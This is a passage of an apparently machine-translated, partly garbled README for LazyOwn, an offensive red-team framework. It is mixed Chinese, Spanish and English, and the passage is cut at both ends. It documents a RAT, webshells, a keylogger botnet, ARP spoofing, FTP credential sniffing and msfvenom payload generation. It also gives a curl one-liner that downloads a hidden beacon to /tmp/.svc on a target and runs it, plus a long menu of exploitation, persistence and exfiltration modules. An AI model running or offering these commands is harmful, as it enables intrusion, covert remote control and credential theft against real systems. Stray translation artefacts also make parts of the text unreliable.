  4. 网络分段:隔离受影响的系统
  5. 监控:监控可疑活动

长期措施

  1. 定期更新:保持所有软件为最新版本
  2. 安全审计:定期进行安全审计
  3. 入侵检测:实施入侵检测系统
  4. 安全意识:培训开发人员安全编码实践
  5. 漏洞管理:建立漏洞管理流程

参考资料

  • CVE-2025-55182
  • React 安全公告
  • NVD 详情
  • 供应商公告

免责声明

本工具仅供教育和道德安全测试目的使用。未经授权访问计算机系统是非法的。使用本工具的用户有责任遵守所有适用的法律和法规。作者对本工具的任何误用或由此造成的任何损害不承担责任。

许可证

本项目根据 MIT 许可证授权 - 有关详细信息,请参阅 LICENSE 文件。

贡献

欢迎贡献!请随时提交 Pull Request。

联系方式

  • 作者:Security Researcher
  • 邮箱:[email protected]
  • Twitter:@security_researcher

致谢

  • 感谢 React 团队披露此漏洞
  • 感谢安全社区的支持
  • 感谢所有贡献者

注意:本工具仅供教育和道德安全测试目的使用。请负责任地使用。``` Use assign to configure parameters. Use show to display the current parameter values. Use run <script_name> to execute a script with the set parameters. Use exit to exit the CLI.

Once the shell is running, you can use the following commands:

list: Lists all LazyOwn Modules. assign : Sets the value of a parameter. For example, assign rhost 192.168.1.1. show: Displays the current values of all parameters. run

┌─[👤grisun0 (LazyOwn👽kali) ~/home/grisun0/LazyOwn][127.0.0.1][http://VariaType.htb] 🌐192.168.1.120 ✗ feature/lazyllmchat-assistant (🐍env) └╼ $ help

  1. Reconnaissance ────────────────── alterx finalrecon ping trace
    apache_users getcap ports trufflehog
    binarycheck gospider proxy tshark_analyze
    cve graudit recon waybackmachine
    dig httprobe serveralive2 whatweb
    dnschef ipinfo sherlock windapsearchscrapeusers dnsenum launchpad sslscan
    dnsmap metabigor tcpdump_capture dnstool_py openssl_sclient tcpdump_icmp

  2. Scanning & Enumeration ────────────────────────── ad_ldap_enum enum4linux_ng nbtscan rpcdump wpscan allin evil_ssdp net_rpc_addmem rpcmap_py
    amass feroxbuster netexec samrdump
    arjun finger_user_enum netview sawks
    arpscan fuzz nikto sessionssh
    batchnmap getnpusers nmapscript skipfish
    bbot gobuster nuclei smbattack
    blazy hound odat smbclient
    bloodhound kerbrute openredirex smbclient_impacket breacher lazynmap osmedeus smbclient_py
    certipy ldapdomaindump parsero smbmap
    certipy_ad ldapsearch parth smtpuserenum
    changeme lookupsid portdiscover snmpcheck
    cme lookupsid_py portservicediscover snmpwalk
    davtest loxs pre2k swaks
    dirsearch lynis pykerbrute vscan
    dmitry magicrecon rdp_check_py wfuzz
    enum4linux mqtt_check_py rpcclient windapsearch

  3. Exploitation ──────────────── aclpwn_py gettgtpkinit_py psexec sqlmap
    addspn_py greatSCT psexec_py sqsh
    autoblody img2cookie py3ttyup ss
    cacti_exploit jwt_tool pyautomate sshexploit
    commix krbrelayx_py pyoracle2 template_helper_serializer cp kusa pywhisker ticketer
    createcookie lazypwn rejetto_hfs_exec unicode_WAFbypass
    createdll lfi rev upload_bypass
    digdug lol seo utf
    download_exploit ms08_067_netapi sharpshooter winbase64payload
    downloader ntpdate shellfire wrapper
    eternal owneredit shellshock www
    excelntdonut padbuster sireprat xss
    filtering powerserver sqli xsstrike
    gets4uticket_py printerbug_py sqli_mssql_test

  4. Post-Exploitation ───────────────────── add2find exe2bin pezorsh
    adversary exe2donutbin pip_proxy
    adversary_yaml extract_yaml pip_repo
    aes_pe find powershell_cmd_stager ai_playbook follina rmfromfind
    apt_proxy hex2shellcode rubeus
    apt_repo internet_proxy scavenger
    atomic_lazyown issue_command_to_c2 scp
    bin2shellcode lazywebshell service_ssh
    convert_remcomsvc_from_file mimikatzpy sessionsshstrace
    cports msfshellcoder shellcode
    create_synthetic ofuscate_string shellcode2elf
    createpayload ofuscatesh shellcode2sylk
    d3monizedshell ofuscatorps1 shellcode_search
    disableav path2hex ssh_cmd

  5. Persistence ─────────────── asprevbase64 ftp msfpc setoolKits backdoor_factory generate_revshell paranoid_meterpreter ssh
    conptyshell grisun0 pwncat toctoc
    createrevshell grisun0w pwncatcs veil
    createwebshell ivy rdp weevely
    createwinrevshell knokknok revwin weevelygen darkarmour listener_go scarecrow
    dr0p1t listener_py service

  6. Privilege Escalation ──────────────────────── responder smbserver

  7. Credential Access ───────────────────── addusers cred john2hash rocky
    adsso_spray creds_py john2keepas searchhash
    cewl crunch john2zip smalldic
    crack_cisco_7_password cubespraying keepass spraykatz
    createcredentials dacledit medusa sshkey
    createhash generatedic passtightvnc sudo
    createmail hashcat passwordspray transform
    createusers_and_hashs hydra refill_password username_anarchy

  8. Lateral Movement ──────────────────── addcli id_rsa penelope sshd wifipass
    bloodyAD lateral_mov_lin regeorg stormbreaker wmiexec
    chisel ligolo rnc targetedKerberoas wmiexecpro dcomexec mssqlcli set_proxychains tord
    getTGT nc shadowsocks upload_c2
    gospherus ngrok socat vpn

  9. Data Exfiltration ───────────────────── adgetpass dploot evilwinrm getuserspns reg_py secretsdump
    decrypt encrypt getadusers gitdumper rsync unzip
    download_c2 evidence getnthash_py gmsadumper samdump2 upload_gofile

  10. Command & Control ───────────────────── atomic_agent automsf emp3r0r mitre_test sliver_server atomic_gen c2 empire msf
    atomic_tests caldera generate_playbook msfrpc
    attack_plan duckyspark iis_webdav_upload_asp my_playbook

  11. Reporting ───────────── apropos createtargets gpt process_scans banners download_malwarebazar groq pth_net
    c2asm extract_ports img2vid pup
    camphish eyewitness malwarebazar vulns
    create_session_json eyewitness_py morse
    createjsonmachine get_avaible_actions name_the_hash createjsonmachine_batch gowitness nmapscripthelp

  12. Miscellaneous ───────────────── acknowledgearp clone_site getseclist links run
    acknowledgeicmp cron graph list sh
    addhosts decode h load_session show
    aliass download_resources hex_to_plaintext nano sys
    assign encode ignorearp news tab
    banner encoderpayload ignoreicmp payload urldecode base64decode encodewinbase64 ip pwd urlencode base64encode exit ip2asn qa v
    check_update fixel ip2hex rhost
    clean fixperm kick rot
    clock gencert lazyscript rotf

  13. Lua Plugin ────────────── generate_c_reverse_shell lolbas_certutil_download_exec generate_cleanup_commands lolbas_certutil_exe
    generate_html_payload lolbas_mshta_js
    generate_lateral_command lolbas_mshta_reverse_shell
    generate_linux_asm_reverse_shell lolbas_rundll32_dll
    generate_linux_raw_shellcode lolbas_wmic_xsl_execution
    generate_lolbird parse_nmap_with_xmlstarlet
    generate_msfvenom_loader run_nuclei_on_nmap_files
    generate_msfvenom_loader_windows run_python_rev_c2
    generate_reverse_shell rundll32_sct_from_url
    generate_stub validate_shellcode
    kerberos_harvest visualize_network
    lolbas_bitsadmin_exe

  14. Yaml Addon. ─────────────── AdaptixC2 GoPEInjection OverRide agentzero gosearch peeko argfuscator gui pretender ATTPwn gui2 PTMultiTools AuroraPatch hack_browser_data PTMultiTools_scan banner_tool hellbird PyinMemoryPE bbr hive pyrit beacon hooka_linux_amd64 raven blacksandbeacon hostdiscover ridenum blacksandbeacon_bof kivi_revshell setoolkit cgoblin_windows laps ShadowLink Clematis lazyaddon_creator shellcode_custom_win_rev_tcp_xored commix2 lazyagentAi SigPloit copy-fail-CVE-2026-31431 lazybinenc spoonmap CVE-2022-22077 lazyftpsniff stratus_detonate CVE_2025_24071_PoC LazyLoader stratus_list demiguise lazymapd toposwarm ebird3 lazyownbt unicorn evilginx2 LazyOwnExplorer upxdump gcr llm vulnbot gemini-cli NullGate vulnbot_groq gen_dll_rev oniux vulnhuntr Get_ReverseShell opencode_adapter watchguard githubot orpheus wspcoerce gomulti_loader_linux gomulti_loader_windows

  15. Adversary YAML. ─────────────────── amsi_c implant_nim_nim infect_c pid_c
    implant_crypt_go implant_rust_rs persist_ps1 shell_c

  16. Artificial Intelligence ─────────────────────────── ai_toggle

Uncategorized Commands ────────────────────── addalias gobuster_dns ipy ollama_enum set
alias gobuster_http listaliases pop shell
edit gobuster_web macro quit shortcuts
EOF help nikto_host rrhost subwfuzz_tool ffuf_enumeration history notify run_pyscript ffuf_tool ipp nuclei_ad_http run_script

┌─[👤grisun0 (LazyOwn👽kali) ~/home/grisun0/LazyOwn][127.0.0.1][http://VariaType.htb] 🌐192.168.1.120 ✗ feature/lazyllmchat-assistant (🐍env) └╼ $

root@kitploit:~
## YouTube 标签
<https://www.youtube.com/hashtag/lazyown>

## 播客
<https://www.youtube.com/watch?v=m4FtlhownvM&list=PLW9Qe5HJK5CFXyIsF9b0NB6n9EY8Am3YZ>

## DeepWiki
<https://deepwiki.com/grisuno/LazyOwn/>```sh
LazyOwn> assign binary_name my_binary
LazyOwn> assign rhost 192.168.1.100
LazyOwn> assign api_key my_api_key
LazyOwn> run lazysearch
LazyOwn> run lazynmap
LazyOwn> exit

image

用于在从 GTFOBins 获取的抓取数据库中搜索。```sh python3 lazysearch.py binario_a_buscar

root@kitploit:~
## 带 GUI 的搜索
附加功能与增强:
AutocompleteEntry:

已添加过滤器,用于从自动补全列表中移除 None 值。
新建攻击向量:

主界面中已添加“新建攻击向量”按钮。
已实现添加新攻击向量并将更新后的数据保存到 Parquet 文件的功能。
导出为 CSV:

主界面中已添加“导出为 CSV”按钮。
已实现将 DataFrame 数据导出到用户选择的 CSV 文件的功能。
用法:

添加新攻击向量:点击“新建攻击向量”按钮,填写字段并保存。
导出为 CSV:点击“导出为 CSV”按钮,并选择保存 CSV 文件的位置。
新函数 scan_system_for_binaries:

使用 file 命令实现系统范围的二进制文件搜索,以判断文件是否为二进制文件。
使用 os.walk 遍历文件系统。
结果显示在 GUI 中的新窗口内。
搜索二进制文件的按钮:

主界面中已添加“搜索系统中的二进制文件”按钮,该按钮会调用 scan_system_for_binaries 函数。
注意:

is_binary 函数使用 Unix 的 file 命令来判断文件是否为二进制可执行文件。如果你使用的是其他操作系统,则需要调整此方法以保持兼容性。
此实现可能会消耗大量资源,因为它会遍历整个文件系统。你可以考虑添加额外选项,将搜索限制到特定目录,或按特定文件类型进行过滤。```sh
python3 LazyOwnExplorer.py

image```sh python3 lazyown.py

root@kitploit:~
如果你想更新,我们按以下步骤进行:```sh
cd LazyOwn
rm parquets/*.csv
rm parquets/*.parquet
./update_db.sh

使用 LazyOwn WebShells 模式

LazyOwn Webshell Collection 是我们框架的 webshell 集合,它允许我们使用各种编程语言在运行 LazyOwn 的机器上建立 webshell。本质上,LazyOwn Webshell 在 modules 目录内启动一个 Web 服务器,使其可以通过 Web 浏览器访问。这使我们既可以通过 Web 单独提供模块,也可以访问 cgi-bin 目录,其中有四个 shell:一个 Bash、一个 Perl、一个 Python,以及一个 ASP,以防目标是 Windows 机器。```sh lazywebshell

root@kitploit:~
y listo ya podemos acceder a cualquiera de estas url:

<http://localhost:8080/cgi-bin/lazywebshell.sh>

<http://localhost:8080/cgi-bin/lazywebshell.py>

<http://localhost:8080/cgi-bin/lazywebshell.asp>

<http://localhost:8080/cgi-bin/lazywebshell.cgi>

![image](https://assets.kitploit.com/production/public/readmes/56369/46d7b61ebc8f339f9ddf47b4587e3a3b2e658653754abe25a57d499da42bb54f/810e9f2ec3bc35e4f4a8fb64f8108a85c581bd0448d21b2cb2956b7c5b4814be-display-v1.webp)

## 使用 Lazy MSFVenom 进行反向 Shell

    执行 `msfvenom` 工具,根据用户输入生成各种 payload。

    此函数提示用户从预定义列表中选择一种 payload 类型,并运行相应的
    `msfvenom` 命令来创建所需的 payload。它处理诸如为 Linux、Windows、macOS 和 Android 系统
    生成不同类型的 payload 等任务,包括对 C payload 使用 Shikata Ga Nai 进行可选编码。

    生成的 payload 会被移动到 `sessions` 目录,并在其中设置适当的权限。此外,
    payload 可以使用 UPX 进行压缩以节省空间。如果选定的 payload 是 Android APK,
    该函数还会对 APK 进行签名并执行必要的后处理步骤。

    :param line: 脚本的命令行参数。
    :return: None```sh
run lazymsfvenom or venom

命令与控制(C2)系统

命令与控制(C2)系统通过具有加密通信的服务器-客户端架构实现远程操作。

image

使用 Lazy PATH 劫持

将在 /tmp 中创建一个文件,其名称为 payload 中设置的 binary_name,在内存中使用 gzip 初始化,并在 payload 中使用 bash。要从 JSON 设置 payload,请使用 payload 命令执行。使用:```sh lazypathhijacking

root@kitploit:~
## 使用 LazyOwn RAT 模式

![image](https://assets.kitploit.com/production/public/readmes/56369/9402abc4a6c873096e3c6017e35f56d0f3c5f5c66cb15a8b4bc9b8a8d54385f7/c3430588984c7ec596fff9b5d7553c0dd773ee29fa26558af681f93cf5433de4-display-v1.webp)


LazyOwn RAT 是一个简单但功能强大的远程管理工具。它具有截屏功能,可以捕获服务器屏幕;具有上传命令,允许我们将文件上传到被入侵的机器;以及一个 C&C 模式,可以向服务器发送命令。它有两种运行模式:客户端模式和服务端模式。它没有进行任何混淆处理,该 RAT 基于 BasicRat。你可以在 GitHub 上找到它:https://github.com/awesome-security/basicRAT 以及 https://github.com/hash3liZer/SillyRAT。虽然后者功能全面得多,但我只是想实现屏幕截图捕获、文件上传和命令发送。也许将来我会添加摄像头查看功能,但那要等到以后再说。```sh
usage: lazyownserver.py [-h] [--host HOST] [--port PORT] --key KEY
lazyownserver.py: error: the following arguments are required: --key

usage: lazyownclient.py [-h] --host HOST --port PORT --key KEY
lazyownclient.py: error: the following arguments are required: --host, --port, --key

LazyOwn> run lazyownclient
[?] lhost and lport and rat_key must be set

LazyOwn> run lazyownserver
[?] rhost and lport and rat_key must be set

luego los comandos son:

upload /path/to/file
donwload /path/to/file
screenshot
sysinfo
fix_xauth #to fix xauth xD
lazyownreverse 192.168.1.100 8888 #Reverse shell to 192.168.1.100 on port 8888 ready to C&C

image

使用 Lazy Meta Extract0r 模式

LazyMeta Extract0r 是一款旨在从多种类型文件中提取元数据的工具,包括 PDF、DOCX、OLE 文件(如 DOC 和 XLS)以及多种图像格式(JPG、JPEG、TIFF)。该工具将遍历指定目录,搜索具有兼容扩展名的文件,提取元数据,并将其保存到输出文件中。

[*] Iniciando: LazyMeta extract0r [;,;]

usage: lazyown_metaextract0r.py [-h] --path PATH lazyown_metaextract0r.py: error: the following arguments are required: --path```sh python3 lazyown_metaextract0r.py --path /home/user

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/56369/12418a4b1a619614f513a2824b0ed26b369099b463f6e4e58c6f01389c5647f5/24e93754e70d5adbfca3184e65afb178ee598f53a3375c8029e0356233a77d8c-display-v1.webp)

## 使用模式 解密 加密

一种加密方法,当然,如果我们拥有密钥,就可以用它来加密文件和解密文件。

![Captura de pantalla 2024-06-08 231900](https://assets.kitploit.com/production/public/readmes/56369/67b1d3295f0fc3ebe4d9103a458fd0683ba8d78a426fc36ebcdbe6cfd8c45c87/61ff68c807f4de0641fcc5e74f9d81403d84a8f7eea58a8401e4c6e9b360e76e-display-v1.webp)```sh
encrypt path/to/file key # to encrypt
decrypt path/to/file.enc key #to decrypt

Uso modo LazyNmap

image

El uso de Lazynmap nos proporciona un script automatizado para un objetivo, en este caso, 127.0.0.1, utilizando Nmap. El script requiere permisos administrativos mediante sudo. También incluye un módulo de descubrimiento de red para identificar qué hay presente en el segmento IP en el que te encuentras. Además, ahora se puede llamar al script sin parámetros usando el alias nmap o con el comando run lazynmap.

image```sh ./lazynmap.sh -t 127.0.0.1 # or in the cli just nmap

root@kitploit:~
## LazyOwn GPT One Liner CLI 助手与研究器的使用

探索使用 LazyOwn GPT One Liner CLI 助手实现渗透测试任务自动化的革命!这个令人惊叹的脚本是 LazyOwn 工具套件的一部分,旨在让您作为渗透测试人员的生活更高效、更有成效。

主要功能:

智能自动化:利用 Groq 的强大功能和先进的自然语言模型,根据您的具体需求生成精确高效的命令。
用户友好界面:只需一个简单的提示,助手即可生成并执行单行脚本,大幅减少创建复杂命令所需的时间和精力。
持续改进:不断转换和优化其知识库,为您提供最佳解决方案,适应每种情况。
简化调试:启用调试模式以获取每一步的详细信息,便于识别和纠正错误。
无缝集成:在您的工作区内轻松运行,利用 Groq API 的强大功能提供快速准确的响应。
安全与控制:

安全的错误处理:智能检测并响应执行错误,确保您对每个生成的命令保持完全控制。
受控执行:在执行任何命令之前,它会请求您的确认,让您安心地确切知道系统上正在执行什么。
轻松配置:

在几秒钟内设置您的 API 密钥,开始享受 LazyOwn GPT One Liner CLI 助手提供的所有优势。快速入门指南可帮助您配置并最大化这一强大工具的潜力。

适合渗透测试人员和开发人员:

优化您的流程:简化并加速安全审计中的命令生成。
持续学习:知识库不断更新和改进,始终为您提供最新的最佳实践和解决方案。
使用 LazyOwn GPT One Liner CLI 助手,改变您的工作方式,使其更快、更高效、更安全。停止在重复和复杂的任务上浪费时间,专注于真正重要的事情:发现和解决漏洞!

加入 LazyOwn 的渗透测试革命,将您的生产力提升到新的水平!

[?] 用法:python lazygptcli.py --prompt "<your prompt>" [--debug]

[?] 选项:

--prompt "编程任务的提示(必需)。"
--debug, -d "启用调试模式以显示调试消息。"
--transform "使用 Groq 将原始知识库转换为增强型知识库。"
[?] 确保在运行脚本之前配置您的 API 密钥:
export GROQ_API_KEY=<your_api_key>
[->] 访问:https://console.groq.com/docs/quickstart(非赞助链接)

要求:

Python 3.x
有效的 Groq API 密钥
获取 Groq API 密钥的步骤:
访问 Groq Console (https://console.groq.com/docs/quickstart) 注册并获取 API 密钥。```sh
export GROQ_API_KEY=<tu_api_key>
python3 lazygptcli.py --prompt "<tu prompt>" [--debug]

image

lazyown_bprfuzzer.py 的用法

按照脚本请求指定的参数提供:该脚本需要以下参数:

usage: lazyown_bprfuzzer.py [-h] --url URL [--method METHOD] [--headers HEADERS] [--params PARAMS] [--data DATA] [--json_data JSON_DATA] [--proxy_port PROXY_PORT] [-w WORDLIST] [-hc HIDE_CODE] --url:将请求发送到的 URL(必填)。 --method:要使用的 HTTP 方法,例如 GET 或 POST(可选,默认值:GET)。 --headers:JSON 格式的请求头(可选,默认值:{})。 --params:JSON 格式的 URL 参数(可选,默认值:{})。 --data:JSON 格式的表单数据(可选,默认值:{})。 --json_data:JSON 格式的请求 JSON 数据(可选,默认值:{})。 --proxy_port:内部代理的端口(可选,默认值:8080)。 -w, --wordlist:用于模糊测试模式的字典文件路径(可选)。 -hc, --hide_code:要在输出中隐藏的 HTTP 状态码(可选)。 请确保提供必需的参数,以确保脚本正确运行。```sh python3 lazyown_bprfuzzer.py --url "http://example.com" --method POST --headers '{"Content-Type": "LAZYFUZZ"}'

root@kitploit:~
形式 2:高级用法

如果您希望利用脚本的高级功能,例如请求重放或模糊测试,请按照以下步骤操作:

请求重放:

要使用请求重放功能,请如前所述提供参数。
在执行过程中,脚本会询问您是否要重复请求。输入 'y' 以重复,或输入 'n' 以终止重放器。
模糊测试:

要使用模糊测试功能,请确保通过 -w 或 --wordlist 参数提供词表。
脚本会将 URL 和其他数据中的单词 LAZYFUZZ 替换为所提供词表中的单词。
在执行过程中,脚本会显示每次模糊测试迭代的结果。
这些是使用 lazyburp.py 脚本的基本和高级方法。根据您的需求,您可以选择最适合您具体情况的方法。```sh
python3 lazyown_bprfuzzer.py \                                                                                                           ─╯
    --url "http://127.0.0.1:80/LAZYFUZZ" \
    --method POST \
    --headers '{"User-Agent": "LAZYFUZZ"}' \
    --params '{"param1": "value1", "param2": "LAZYFUZZ"}' \
    --data '{"key1": "LAZYFUZZ", "key2": "value2"}' \
    --json_data '{"key3": "LAZYFUZZ"}' \
    --proxy_port 8080 \
    -w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \
    -hc 501

请提供需要翻译的Markdown内容。```sh python3 lazyown_bprfuzzer.py \ ─╯ --url "http://127.0.0.1:80/LAZYFUZZ"
--method POST
--headers '{"User-Agent": "LAZYFUZZ"}'
--params '{"param1": "value1", "param2": "LAZYFUZZ"}'
--data '{"key1": "LAZYFUZZ", "key2": "value2"}'
--json_data '{"key3": "LAZYFUZZ"}'
--proxy_port 8080
-w /usr/share/seclist/SecLists-master/Discovery/Variables/awesome-environment-variable-names.txt \

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/56369/536bf1028ec5c58968040226c36296d17707cc7236e75a4245c2618835265d78/6ff4dbf1c94f750b69acf64298b86dd7982a7ccbc25d4fdaa69b980a254bd63a-display-v1.webp)
注意:要使用字典,请在 /usr/share/seclists 中运行以下命令:```sh
now the command 'getseclist' do that automated.
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
&& unzip SecList.zip \
&& rm -f SecList.zip

LazyOwn FTP 嗅探模式的使用

该模块用于在网络中的 FTP 服务器上搜索密码。有人可能会说 FTP 已不再使用,但你会惊讶地发现,我曾见过一些关键基础设施环境中,服务器上运行着大量 FTP 服务。 :)```sh assign device eth0 run lazyftpsniff

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/56369/2c92e5d852a586494d37d892de49b42e849d9602a75cb399dbfef5d2aaf95b44/4cb2b5a8fa35fca9f90ac2471b81765100aaa30b84f11795ee77e727cb3113c0-display-v1.webp)

## 使用 LazyReverseShell 模式

监听```sh
nc -nlvp 1337 #o el puerto que escojamos

image

然后在受害机器上```sh ./lazyreverse_shell.sh --ip 127.0.0.1 --puerto 1337

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/56369/207a550ff7c9ce047796bea119a6fd31e0f895b88a8ca98a0c2b231f6e697fd9/d03d9a1178703f93e04997e8d2b10b3a1591e14c707246e517693672653ecc56-display-v1.webp)

## 使用 Lazy Curl 进行侦察模式

该模块位于 modules 目录中,使用方法如下:```sh
chmod +x lazycurl.sh

然后```sh ./lazycurl.sh --mode GET --url http://10.10.10.10

root@kitploit:~
用法。

GET:```sh
./lazycurl.sh --mode GET --url http://10.10.10.10

POST:```sh ./lazycurl.sh --mode POST --url http://10.10.10.10 --data "param1=value1&param2=value2"

root@kitploit:~
TRACE:```sh
./lazycurl.sh --mode TRACE --url http://10.10.10.10
```sh
文件上传:```sh
./lazycurl.sh --mode UPLOAD --url http://10.10.10.10 --file file.txt

wordlist 暴力破解模式:```sh ./lazycurl.sh --mode BRUTE_FORCE --url http://10.10.10.10 --wordlist /usr/share/wordlists/rockyou.txt

root@kitploit:~
确保根据你的需求调整参数,并且你为各选项提供的值在每种情况下都是有效的。

## ARPSpoofing 模式的使用

该脚本使用 Scapy 提供 ARP 欺骗攻击。在 payload 中,你必须设置 lhost、rhost 以及你将用于执行 ARP 欺骗的设备。```sh
assign rhost 192.168.1.100
assign lhost 192.168.1.1
assign device eth0
run lazyarpspoofing

LazyGathering 模式的使用

该脚本提供了正在执行该工具的系统的 X 光视图,可深入了解其配置和状态。

image```sh run lazygath

root@kitploit:~
## Lazy Own LFI RFI 2 RCE 模式的使用

LFI RFI 2 RCE 模式旨在针对 payload.json 中指定的参数测试一些较为知名的 payload。这样可以全面评估目标系统中的本地文件包含(LFI)、远程文件包含(RFI)和远程代码执行(RCE)漏洞。

![image](https://assets.kitploit.com/production/public/readmes/56369/3bd4f818fd3a15a099e25d21604b8362e5ce76dee05d56f182a6e4817c81edd6/7ba305b87f294e6253a90746031a826f95bf3c65a850ec3aa4e8b4b90dd41208-display-v1.webp)```sh
payload
run lazylfi2rce

LazyOwn 嗅探模式的使用

https://www.youtube.com/watch?v=_-DDiiMrIlE

嗅探模式允许通过接口捕获网络流量,使用 -i 选项,该选项为必填项。还有许多其他可选设置可根据需要进行调整。

用法```bash

usage: lazysniff.py [-h] -i INTERFACE [-c COUNT] [-f FILTER] [-p PCAP] lazysniff.py: error: the following arguments are required: -i/--interface

Captura de pantalla 2024-06-05 031231

To use the sniffer from the framework, you must configure the device with the command:

root@kitploit:~
运行 lazysniff
或者直接
sniff```

### Experimental Obfuscation Using PyInstaller

This feature is in experimental mode and does not work fully due to a path issue. Soon, it will support obfuscation using PyInstaller.


```sh
./py2el.sh```

## Experimental NetBIOS Exploit

This feature is in experimental mode as it is not functioning yet... (coming soon, possibly an implementation of EternalBlue among other things...)


```sh
运行 lazynetbios```

## Experimental LazyBotNet with Keylogger for Windows and Linux

This feature is in experimental mode, and the decryption of the keylogger logs is not functioning xD. Here we see for the first time in action the `payload` command, which sets all the configuration in our `payload.json`, allowing us to preload the configuration before starting the framework.


```sh
payload
run lazybotnet```

## Interactive Menus

The script features interactive menus to select actions to be performed. In server mode, it displays relevant options for the victim machine, while in client mode, it shows options relevant to the attacking machine.

### Clean Interruption

The script handles the SIGINT signal (usually generated by Control + C) to exit cleanly.

## License

This project is licensed under the GPL v3 License. The information contained in GTFOBins is owned by its authors, to whom we are immensely grateful for the information provided.

## Acknowledgments ✌

A special thanks to [GTFOBins](https://gtfobins.github.io/) for the valuable information they provide and to you for using this project. Also, thanks for your support Tito S4vitar! who does an extraordinary job of outreach. Of course, I use the `extractPorts` function in my `.zshrc` :D, thanks to deepwiki to help us with doc. ( https://deepwiki.com/grisuno/LazyOwn/ ), thanks to plaintext who does an extraordinary job of outreach and we adopted PTMultiTools it's very impresive

### Thanks to pwntomate 🍅

An excellent tool that I adapted a bit to work with the project; all credits go to its author honze-net Andreas Hontzia. Visit and show love to the project: <https://github.com/honze-net/pwntomate>

### Thanks to Sicat 🐈

An excellent tool for CVE detection, I implemented only the keyword search as I had to change some libraries. Soon also for XML generated by nmap :) Total thanks to justakazh. <https://github.com/justakazh/sicat/>

### Thanks to josefcohernandez

For identifying and reporting the Docker build failures caused by the repo.charm.sh outage and the Python version incompatibility. His report led to the fixes in `lazyown-docker/Dockerfile`.

### Thanks to EQSTLab (via yym8538)

For two critical security advisories that helped us harden the framework and fix serious vulnerabilities. Their responsible disclosure makes LazyOwn safer for the entire community.

## BlackSandBeacon — Linux BOF

**BlackSandBeacon** brings Beacon Object File (BOF) extensibility to Linux for the
first time in an open-source C2 framework. No commercial C2 (including Cobalt Strike)
offers Linux BOF support.

### What is Linux BOF?

On Windows, BOFs are position-independent PE COFF objects loaded by the beacon at
runtime, giving operators an in-memory plugin system without spawning new processes.
BlackSandBeacon ports this model to Linux:

- BOFs compile as **position-independent ELF shared objects** (`.so`) with GCC
  (`-shared -fPIC -nostartfiles`).
- The beacon loads them at runtime via `dlopen` — no disk writes after delivery,
  no new process, no shell.
- The **`datap` API** (`BeaconDataParse`, `BeaconDataInt`, `BeaconDataExtract`,
  `BeaconPrintf`, `BeaconOutput`) is source-compatible with the Windows BOF contract,
  so existing BOF authors can port by replacing Win32 calls with Linux syscalls or
  libc equivalents.
- Advanced BOFs can use **direct syscalls via inline assembly** or `io_uring` for
  kernel interaction without libc linking.

### Deployment via LazyOwn

```bash
# 1. 构建并暂存 beacon
(LazyOwn) > blacksandbeacon

# 2. 投递到目标(命令在目标上运行)
curl -sk "http://{lhost}:{lport}/blacksandbeacon" -o /tmp/.svc && chmod +x /tmp/.svc && /tmp/.svc &

# 3. 构建并暂存 BOF 加载器
(LazyOwn) > blacksandbeacon_bof

# 4. 将 BOF 加载器投递到活动会话
curl -sk "http://{lhost}:{lport}/bof_loader" -o /tmp/.bof && chmod +x /tmp/.bof && /tmp/.bof```

### Porting a Windows BOF to Linux

```c
// 将 Win32 API 调用替换为直接系统调用或 libc 等效项。
// datap API 保持不变。
#include "beacon.h"

void go(char *args, int len) {
    datap parser;
    BeaconDataParse(&parser, args, len);
    char *target = BeaconDataExtract(&parser, NULL);
    // Linux:使用 syscall(SYS_open, ...) 代替 CreateFile
    BeaconPrintf(CALLBACK_OUTPUT, "target: %s\n", target);
}```

Compile: `gcc -shared -fPIC -nostartfiles -o mybof.so mybof.c`

### Adoption gap this closes

| Capability | Cobalt Strike | Sliver | Havoc | LazyOwn + BlackSandBeacon |
|---|---|---|---|---|
| Windows BOF | Yes | No | No | Yes (via `beacon` addon) |
| Linux BOF | **No** | **No** | **No** | **Yes** |
| ARM BOF | No | No | No | Planned (`blackzincbeacon`) |
| Open source | No | Yes | Yes | Yes |

## Related Projects

LazyOwn ships as the "all-in-one" front of a small ecosystem of focused
red-team tools. Each project below stands on its own and can be wired into
LazyOwn through `lazyaddons/*.yaml`, the C2 implant pipeline, or the MCP
`lazyown_palette --info` view (which exposes the graphify-derived `calls`
and `related` neighbours of every command).

### Lightweight beacons (C / ASM)

Drop-in replacements for the bundled Go beacon when you need a smaller
footprint or per-architecture artefacts:

- **[beacon](https://github.com/grisuno/beacon)** — minimalist Windows beacon in C with BOF support via Early Bird APC injection and NT Native API calls. Pairs with LazyOwn's malleable C2 profile. Wired in via `lazyaddons/beacon.yaml`.
- **[blacksandbeacon](https://github.com/grisuno/blacksandbeacon)** — Linux-native beacon in C with first-class **Linux BOF (Beacon Object File)** support via ELF shared-object injection and direct syscalls. BOFs are loaded at runtime through a `dlopen` runtime — the same extensibility model as Windows BOF but targeting Linux kernel internals. **No commercial C2 framework (including Cobalt Strike) offers Linux BOF support.** Wired in via `lazyaddons/blacksandbeacon.yaml`; BOF loader via `lazyaddons/blacksandbeacon_bof.yaml`.
- **[blackzincbeacon](https://github.com/grisuno/blackzincbeacon)** — ARM build of the same family, for embedded / IoT engagements.

### Lightweight C2 frameworks

Alternative C2 surfaces that speak the same beacon protocol as `lazyc2.py`
or that can serve as a teamserver back-end:

- **[BlackObsidianC2](https://github.com/grisuno/BlackObsidianC2)** — small, fast Go C2 server intended as a stripped-down companion to `lazyc2.py`.
- **[LazyOwnBT](https://github.com/grisuno/LazyOwnBT)** — Bluetooth / proximity-aware C2 PoC; useful when the engagement scope explicitly covers RF.

### AI / orchestration

Drop into LazyOwn through MCP, the `toposwarm` lazyaddon, or directly:

- **[toposwarm](https://github.com/grisuno/toposwarm)** — natural-language router on top of the LazyOwn command catalogue; ships as both a lazyaddon and a Claude Code skill.
- **[LazyOwnOpenCodeAdapter](https://github.com/grisuno/LazyOwnOpenCodeAdapter)** — bridge between LazyOwn and OpenCode-style coding agents.

### Loaders, shellcode runners and post-exploitation

Used both by humans through pwntomate `.tool` files and by the autonomous
daemon when the reactive selector recommends an in-memory technique:

